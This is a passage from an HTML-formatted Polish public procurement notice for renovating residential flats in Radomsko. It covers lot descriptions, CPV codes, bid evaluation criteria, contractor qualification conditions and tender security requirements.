stanowiący dodatek nr 28b ,<br/>c) Przedmiar robót b. sanitarna - lokal ul. Warszyca 1/11 - stanowiący dodatek nr 28c ,<br/>d) Przedmiar robót b. budowlana - lokal ul. Warszyca 1/21 - stanowiący dodatek nr 33a ,<br/>e) Przedmiar robót b. elektryczna - lokal ul. Warszyca 1/21 - stanowiący dodatek nr 33b ,<br/>f) Przedmiar robót b. sanitarna - lokal ul. Warszyca 1/21 - stanowiący dodatek nr 33c ,<br/>g) Przedmiar robót b. budowlana - lokal ul. Piłsudskiego 25/8 - stanowiący dodatek nr 38a ,<br/>h) Przedmiar robót b. elektryczna - lokal ul. Piłsudskiego 25/8 - stanowiący dodatek nr 38b,<br/>i) Przedmiar robót b. sanitarna - lokal ul. Piłsudskiego 25/8 - stanowiący dodatek nr 38c .<br/>4) Zamawiający w opisie przedmiotu zamówienia zawartym w SWZ określił wymagania jakościowe odnoszące się do co<br/>najmniej głównych elementów składających się na przedmiot zamówienia w tym w umowie, opisach, specyfikacjach<br/>technicznych.<br/>5) Zgodnie z art. 101 ust. 4 ustawy w sytuacji, gdyby w opisach, przedmiarach, specyfikacjach technicznych, a więc w<br/>dokumentach opisującym przedmiot zamówienia, zawarto odniesienie do norm, ocen technicznych, aprobat, specyfikacji<br/>technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 ustawy, a takim<br/>odniesieniom nie towarzyszyło wyrażenie „lub równoważne”, to Zamawiający dopuszcza rozwiązania równoważne<br/>opisywanym w każdej takiej normie, ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji<br/>technicznych. W związku z powyższym należy przyjąć, że każdej: normie, ocenie technicznej, aprobacie, specyfikacji<br/>technicznej, systemowi referencji technicznych występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub<br/>równoważne”. Jeżeli w w opisach, przedmiarach, specyfikacjach technicznych, użyto nazwy materiału(ów) lub<br/>urządzenia(ń), parametry identyfikujące producenta, pochodzenie, służą one jedynie do ustalenia charakterystyki, jakości<br/>tych materiałów lub urządzeń. Wykonawca ma obowiązek wbudować materiały lub urządzenia posiadające nie gorsze<br/>właściwości zapewniające zgodne z opisami, przedmiarami, specyfikacjami technicznymi funkcjonowanie elementów, części<br/>lub całego obiektu budowlanego. Tym samym dopuszcza się do stosowania przy realizacji zamówienia materiały lub<br/>urządzenia (ogólnie produkty) równoważne innych producentów. Jeżeli użyto w SWZ lub dodatkach wymogu posiadania<br/>certyfikatu wydanego przez jednostkę oceniającą zgodność lub sprawozdania z badań przeprowadzonych przez tę<br/>jednostkę jako środka dowodowego potwierdzającego zgodność z wymaganiami lub cechami określonymi w opisie<br/>przedmiotu zamówienia lub warunkach realizacji zamówienia oznacza, że Zamawiający akceptuje również certyfikaty<br/>wydane przez inne równoważne jednostki oceniające zgodność. Jeżeli wymagana jest określona etykieta, zamawiający<br/>akceptuje wszystkie etykiety potwierdzające, że dane roboty budowlane, dostawy lub usługi spełniają równoważne<br/>wymagania określonej przez zamawiającego etykiety.<br/>6) Określenie wymagań dotyczących zatrudniania przez wykonawcę lub podwykonawcę osób na podstawie stosunku pracy - szczegóły<br/>w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45262600-7 - Różne specjalne roboty budowlane</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45315000-8 - Instalowanie urządzeń elektrycznego ogrzewania i innego sprzętu elektrycznego w budynkach</p> <p class="mb-0">45231100-6 - Ogólne roboty budowlane związane z budową rurociągów</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla porównania ofert Zamawiający przyjmie:<br/>a) łączną cenę ryczałtową brutto obejmującą podatek od towarów i usług (z VAT) za wykonanie całości przedmiotu części nr 2<br/>zamówienia – wg przypisanej wagi kryterium Ceny (C) tj. 90 %<br/>i<br/>b) zadeklarowany okres gwarancji Wykonawcy (kryterium oceny ofert G) na cały przedmiot zamówienia w tym wykonane roboty oraz<br/>zastosowane materiały, z zastrzeżeniem że okres gwarancji Wykonawcy na zamontowane urządzenia będzie równy okresowi<br/>gwarancji udzielanej przez producenta (minimum 24 miesięcy), licząc od podpisania protokołu odbioru końcowego przedmiotu<br/>zamówienia – wg przypisanej wagi kryterium Okres gwarancji Wykonawcy (G) 10 %,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji Wykonawcy (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część nr 3 zamówienia pn. „Remont lokali mieszkalnych położonych w Radomsku przy ul. Narutowicza 31/3 i 42/2, ul.<br/>Wyszyńskiego 24/7, ul. Plac 3 Maja 12/4”:<br/>1) Przedmiotem części nr 3 zamówienia jest remont lokali mieszkalnych położonych w Radomsku przy ul. Narutowicza 31/3<br/>i 42/2, ul. Wyszyńskiego 24/7, ul. Plac 3 Maja 12/4, który należy wykonać zgodnie z umową, specyfikacjami technicznymi<br/>wykonania i odbioru robót, rysunkami i opisem oraz zasadami wiedzy technicznej. Przedmiary robót załączone do SWZ<br/>pełnią tylko rolę informacyjną – obowiązującą formą wynagrodzenia jest ryczałt.<br/>2) Szczegółowy opis przedmiotu części nr 3 zamówienia stanowią:<br/>a) wzór umowy dot. części nr 3 zamówienia - stanowiący dodatek nr 8c,<br/>b) specyfikacja techniczna wykonania i odbioru robót – lokal ul. Narutowicza 31/3- stanowiąca dodatek nr 39,<br/>c) rysunek stan istniejący – lokal ul. Narutowicza 31/3 - stanowiący dodatek nr 40,<br/>d) rysunek stan projektowany wraz opisem zakresu prac – lokal ul. Narutowicza 31/3 - stanowiący dodatek nr 41,<br/>e) dokumentacja zdjęciowa dot. części nr 3 zamówienia – lokal ul. Narutowicza 31/3 - stanowiąca dodatek nr 42,<br/>f) specyfikacja techniczna wykonania i odbioru robót – lokal ul. Narutowicza 42/2- stanowiąca dodatek nr 44,<br/>g) rysunek stan istniejący – lokal ul. Narutowicza 42/2 - stanowiący dodatek nr 45,<br/>h) rysunek stan projektowany wraz opisem zakresu prac – lokal ul. Narutowicza 42/2 - stanowiący dodatek nr 46,<br/>i) dokumentacja zdjęciowa dot. części nr 3 zamówienia – lokal ul. Narutowicza 42/2 - stanowiąca dodatek nr 47,<br/>j) specyfikacja techniczna wykonania i odbioru robót – lokal ul. Wyszyńskiego 24/7- stanowiąca dodatek nr 49,<br/>k) rysunek stan istniejący – lokal ul. Wyszyńskiego 24/7- stanowiący dodatek nr 50,<br/>l) rysunek stan projektowany wraz opisem zakresu prac – lokal ul. Wyszyńskiego 24/7 - stanowiący dodatek nr 51,<br/>m) dokumentacja zdjęciowa dot. części nr 3 zamówienia – lokal ul. Wyszyńskiego 24/7 - stanowiąca dodatek nr 52,<br/>n) specyfikacja techniczna wykonania i odbioru robót – lokal ul. Plac 3 Maja 12/4- stanowiąca dodatek nr 54,<br/>o) rysunek stan istniejący – lokal ul. Plac 3 Maja 12/4- stanowiący dodatek nr 55,<br/>p) rysunek stan projektowany wraz opisem zakresu prac – lokal ul. Plac 3 Maja 12/4 - stanowiący dodatek nr 56,<br/>q) dokumentacja zdjęciowa dot. części nr 3 zamówienia – lokal ul. Plac 3 Maja 12/4 - stanowiąca dodatek nr 57.<br/>3) Ze względu na charakter wynagrodzenia (ryczałt) - funkcję informacyjną pełnią:<br/>a) Przedmiar robót b. budowlana - lokal ul. Narutowicza 31/3 - stanowiący dodatek nr 43a,<br/>b) Przedmiar robót b. elektryczna - lokal ul. Narutowicza 31/3- stanowiący dodatek nr 43b,<br/>c) Przedmiar robót b. sanitarna - lokal ul. Narutowicza 31/3 - stanowiący dodatek nr 43c ,<br/>d) Przedmiar robót b. budowlana - lokal ul. Narutowicza 42/2 - stanowiący dodatek nr 48a,<br/>e) Przedmiar robót b. elektryczna - lokal ul. Narutowicza 42/2 - stanowiący dodatek nr 48b,<br/>f) Przedmiar robót b. sanitarna - lokal ul. Narutowicza 42/2 - stanowiący dodatek nr 48c ,<br/>g) Przedmiar robót b. budowlana - lokal ul. Wyszyńskiego 24/7 - stanowiący dodatek nr 53a ,<br/>h) Przedmiar robót b. elektryczna - lokal ul. Wyszyńskiego 24/7 - stanowiący dodatek nr 53b,<br/>i) Przedmiar robót b. sanitarna - lokal ul. Wyszyńskiego 24/7 - stanowiący dodatek nr 53c,<br/>g) Przedmiar robót b. budowlana - lokal ul. Plac 3 Maja 12/4 - stanowiący dodatek nr 58a,<br/>h) Przedmiar robót b. elektryczna - lokal ul. Plac 3 Maja 12/4 - stanowiący dodatek nr 58b,<br/>i) Przedmiar robót b. sanitarna - lokal ul. Plac 3 Maja 12/4 - stanowiący dodatek nr 58c.<br/>4) Zamawiający w opisie przedmiotu zamówienia zawartym w SWZ określił wymagania jakościowe odnoszące się do co<br/>najmniej głównych elementów składających się na przedmiot zamówienia w tym w umowie, opisach, specyfikacjach<br/>technicznych.<br/>5) Zgodnie z art. 101 ust. 4 ustawy w sytuacji, gdyby w opisach, przedmiarach, specyfikacjach technicznych, a więc w<br/>dokumentach opisującym przedmiot zamówienia, zawarto odniesienie do norm, ocen technicznych, aprobat, specyfikacji<br/>technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 ustawy, a takim<br/>odniesieniom nie towarzyszyło wyrażenie „lub równoważne”, to Zamawiający dopuszcza rozwiązania równoważne<br/>opisywanym w każdej takiej normie, ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji<br/>technicznych. W związku z powyższym należy przyjąć, że każdej: normie, ocenie technicznej, aprobacie, specyfikacji<br/>technicznej, systemowi referencji technicznych występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub<br/>równoważne”. Jeżeli w w opisach, przedmiarach, specyfikacjach technicznych, użyto nazwy materiału(ów) lub<br/>urządzenia(ń), parametry identyfikujące producenta, pochodzenie, służą one jedynie do ustalenia charakterystyki, jakości<br/>tych materiałów lub urządzeń. Wykonawca ma obowiązek wbudować materiały lub urządzenia posiadające nie gorsze<br/>właściwości zapewniające zgodne z opisami, przedmiarami, specyfikacjami technicznymi funkcjonowanie elementów, części<br/>lub całego obiektu budowlanego. Tym samym dopuszcza się do stosowania przy realizacji zamówienia materiały lub<br/>urządzenia (ogólnie produkty) równoważne innych producentów. Jeżeli użyto w SWZ lub dodatkach wymogu posiadania<br/>certyfikatu wydanego przez jednostkę oceniającą zgodność lub sprawozdania z badań przeprowadzonych przez tę<br/>jednostkę jako środka dowodowego potwierdzającego zgodność z wymaganiami lub cechami określonymi w opisie<br/>przedmiotu zamówienia lub warunkach realizacji zamówienia oznacza, że Zamawiający akceptuje również certyfikaty<br/>wydane przez inne równoważne jednostki oceniające zgodność. Jeżeli wymagana jest określona etykieta, zamawiający<br/>akceptuje wszystkie etykiety potwierdzające, że dane roboty budowlane, dostawy lub usługi spełniają równoważne<br/>wymagania określonej przez zamawiającego etykiety.<br/>6) Określenie wymagań dotyczących zatrudniania przez wykonawcę lub podwykonawcę osób na podstawie stosunku pracy- szczegóły w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45262600-7 - Różne specjalne roboty budowlane</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45315000-8 - Instalowanie urządzeń elektrycznego ogrzewania i innego sprzętu elektrycznego w budynkach</p> <p class="mb-0">45231100-6 - Ogólne roboty budowlane związane z budową rurociągów</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla porównania ofert Zamawiający przyjmie:<br/>a) łączną cenę ryczałtową brutto obejmującą podatek od towarów i usług (z VAT) za wykonanie całości przedmiotu części nr 3<br/>zamówienia – wg przypisanej wagi kryterium Ceny (C) tj. 90 %<br/>i<br/>b) zadeklarowany okres gwarancji Wykonawcy (kryterium oceny ofert G) na cały przedmiot zamówienia w tym wykonane roboty oraz<br/>zastosowane materiały, z zastrzeżeniem że okres gwarancji Wykonawcy na zamontowane urządzenia będzie równy okresowi<br/>gwarancji udzielanej przez producenta (minimum 24 miesięcy), licząc od podpisania protokołu odbioru końcowego przedmiotu<br/>zamówienia – wg przypisanej wagi kryterium Okres gwarancji Wykonawcy (G) 10 %,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji Wykonawcy (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia następujące warunki udziału w postępowaniu,<br/>dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań.<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań.<br/>4) zdolności technicznej lub zawodowej<br/>Określenie warunków:<br/>4.1.1) dot. części nr 1 zamówienia: wymagane jest posiadanie wiedzy i doświadczenia, tj. warunek zostanie spełniony, jeżeli<br/>Wykonawca wykaże, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwie roboty budowlane (zamówienia – umowy) o łącznej<br/>wartości nie mniejszej niż 60 000,00 zł netto (bez VAT) obejmujące co najmniej roboty ogólnobudowlane i roboty<br/>instalacyjne elektryczne i/lub sanitarne w budynku/-ach w tym co najmniej jedną robotę budowlaną (zamówienie – umowę) o<br/>łącznej wartości nie mniejszej niż 20 000,00 zł netto (bez VAT) obejmującą co najmniej roboty ogólnobudowlane i roboty<br/>instalacyjne elektryczne i/lub sanitarne w budynku/-ach, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania<br/>oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty,<br/>4.1.2) dot. części nr 2 zamówienia: wymagane jest posiadanie wiedzy i doświadczenia, tj. warunek zostanie spełniony, jeżeli<br/>Wykonawca wykaże, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwie roboty budowlane (zamówienia – umowy) o łącznej<br/>wartości nie mniejszej niż 60 000,00 zł netto (bez VAT) obejmujące co najmniej roboty ogólnobudowlane i roboty<br/>instalacyjne elektryczne i/lub sanitarne w budynku/-ach w tym co najmniej jedną robotę budowlaną (zamówienie – umowę) o<br/>łącznej wartości nie mniejszej niż 20 000,00 zł netto (bez VAT) obejmującą co najmniej roboty ogólnobudowlane i roboty<br/>instalacyjne elektryczne i/lub sanitarne w budynku/-ach, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania<br/>oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty,<br/>4.1.3) dot. części nr 3 zamówienia: wymagane jest posiadanie wiedzy i doświadczenia, tj. warunek zostanie spełniony, jeżeli<br/>Wykonawca wykaże, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwie roboty budowlane (zamówienia – umowy) o łącznej<br/>wartości nie mniejszej niż 60 000,00 zł netto (bez VAT) obejmujące co najmniej roboty ogólnobudowlane i roboty<br/>instalacyjne elektryczne i/lub sanitarne w budynku/-ach w tym co najmniej jedną robotę budowlaną (zamówienie – umowę) o<br/>łącznej wartości nie mniejszej niż 20 000,00 zł netto (bez VAT) obejmującą co najmniej roboty ogólnobudowlane i roboty<br/>instalacyjne elektryczne i/lub sanitarne w budynku/-ach, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania<br/>oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na wezwanie Zamawiającego, Wykonawca zobowiązany jest złożyć następujące oświadczenia lub dokumenty, w celu potwierdzenia braku<br/>podstaw wykluczenia Wykonawcy z udziału w postępowaniu:<br/>1) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie<br/>podstaw wykluczenia z postępowania wskazanych przez zamawiającego – z wykorzystaniem wzoru stanowiącego dodatek nr 5a do<br/>SWZ.<br/>W/w oświadczenie w przypadku wspólnego ubiegania się o zamówienie przez wykonawców (dotyczy również wspólników spółki<br/>cywilnej) - składa każdy z Wykonawców osobno.<br/>2) W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby na zasadach określonych w art. 118<br/>ustawy, Wykonawca zobowiązany jest złożyć oświadczenie wymienione w pkt 10.3.1. ppkt 1 SWZ podmiotu udostępniającego te<br/>zasoby - z wykorzystaniem wzoru stanowiącego dodatek nr 5b do SWZ .<br/>W przypadku, gdy Wykonawca powołuje się na zasoby innych podmiotów, w/w oświadczenie, składa każdy z tych podmiotów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty - z wykorzystaniem wzoru określonego w dodatku nr 6 do SWZ,<br/>Uwaga : Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, dostaw lub usług, wykonywanych<br/>wspólnie z innymi wykonawcami, w/w wykaz, powinien dotyczyć robót budowlanych, w których wykonaniu wykonawca ten<br/>bezpośrednio<br/>uczestniczył.<br/>Okresy wyrażone w latach, o których mowa w pkt 10.3.2 ppkt 1 lit. a SWZ liczy się wstecz od dnia w którym upływa termin składania<br/>ofert.<br/>2) zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów - w przypadku polegania przez Wykonawcę na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby - Wykonawca składa wraz z ofertą ten dokument – z możliwością wykorzystania wzoru<br/>stanowiącego dodatek nr 7 do SWZ.<br/>3) oświadczenie, z którego wynika, które roboty budowlane, usługi wykonają poszczególni wykonawcy – zgodnie z pkt 8.2 ppkt 6<br/>SWZ - dołączyć do oferty w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - z wykorzystaniem wzoru<br/>stanowiącego dodatek nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca zobowiązany jest złożyć:<br/>1) wypełniony formularz ofertowy o treści zgodnej z określoną we wzorze stanowiącym dodatek nr 1 do SWZ ,<br/>2) pełnomocnictwo/-a - do reprezentowania odpowiednio wykonawcy, wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia publicznego, podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy, określające jego<br/>zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy lub tego podmiotu – Wykonawca składa wraz z ofertą ,<br/>3) oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby - w przypadku<br/>polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby Wykonawca składa niniejsze oświadczenia<br/>wraz z oświadczeniami, o którym mowa w pkt 10.1 ppkt 2 i 3 SWZ - z wykorzystaniem wzorów stanowiących dodatki nr 2b i<br/>3b do SWZ.<br/>W przypadku, gdy Wykonawca powołuje się na zasoby innych podmiotów, w/w oświadczenia, składa każdy z tych<br/>podmiotów.<br/>Zamawiający w celu potwierdzenia braku podstaw wykluczenia wykonawcy mającego siedzibę lub miejsce zamieszkania<br/>poza granicami Rzeczypospolitej Polskiej, wymaga złożenia oświadczeń, o których mowa w pkt 10.1 oraz 10.3.1 SWZ.<br/>Uwaga do SEKCJI V-KWALIFIKACJA WYKONAWCY- wykluczenie Wykonawcy na podstawie art. 108 ust. 1, art. 109 ust. 1<br/>pkt 4 ustawy Pzp i zgodnie z art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego ( t.j.DZ. U. z 2024 r.<br/>poz. 507 ze zm)-szczegóły w SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta musi być zabezpieczona wadium w wysokości:<br/>a) część nr 1 zamówienia pn. „Remont lokali mieszkalnych położonych w Radomsku przy ul. Warszyca 4/16 i 6, ul.<br/>Młodzowskiej 1/6”: 1 000,00 zł (słownie jeden tysiąc złotych),<br/>b) część nr 2 zamówienia pn. „Remont lokali mieszkalnych położonych w Radomsku przy ul. Warszyca 1/11 i 21, ul.<br/>Piłsudskiego 25/8”: 1 000,00 zł (słownie jeden tysiąc złotych),<br/>c) część nr 3 zamówienia pn. „Remont lokali mieszkalnych położonych w Radomsku przy ul. Narutowicza 31/3 i 42/2, ul.<br/>Wyszyńskiego 24/7, ul. Plac 3 Maja 12/4”: 1 000,00 zł (słownie jeden tysiąc złotych).<br/>2. Wadium musi być wniesione przed upływem terminu składania ofert wskazanym w pkt 16.2 SWZ.<br/>3. Wykonawca może wnieść wadium w jednej lub kilku następujących formach:<br/>1) pieniądzu, przelewem na rachunek bankowy Zamawiającego w Bank PEKAO S.A. I Oddział w Radomsku numer<br/>rachunku 91 1240 3132 1111 0000 2977 7165<br/>z dopiskiem: Wadium - „ Remont lokali mieszkalnych położonych w Radomsku przy ul. Warszyca 1/11 i 21, ul. Warszyca<br/>4/16 i 6, ul. Wyszyńskiego 24/7, ul. Narutowicza 31/3 i 42/2, ul. Młodzowskiej 1/6, ul. Piłsudskiego 25/8 oraz ul. Plac 3 Maja<br/>12/4 część nr ………. zamówienia”<br/>Uwaga:<br/>Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku 